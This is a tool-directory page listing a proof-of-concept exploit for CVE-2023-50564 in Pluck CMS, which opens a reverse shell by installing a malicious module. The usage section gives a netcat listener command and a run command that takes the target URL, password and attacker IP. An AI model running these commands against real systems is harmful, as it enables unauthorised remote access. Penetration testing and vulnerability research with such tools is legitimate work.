Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-50564 — Proof-of-concept exploit for CVE-2023-50564 targeting Pluck CMS, delivering a reverse shell via malicious module installation. | Kitploit
Tools/GitHubGitHub/ipuig/cve-2023-50564
Payload GenerationVulnerability AnalysisExploitationReverse EngineeringWeb Application ExploitationArchived
GitHubipuig/cve-2023-50564

CVE-2023-50564

Proof-of-concept exploit for CVE-2023-50564 targeting Pluck CMS, delivering a reverse shell via malicious module installation.

View Repository
172 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-50564

How to use

First setup a listener for the reverse shell.
Terminal 1

root@kitploit:~
nc -nlvp <lport>

Execute the script which will attempt to install a pluck module sending the reverse shell back to us.
Terminal 2

root@kitploit:~
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>
Download Tool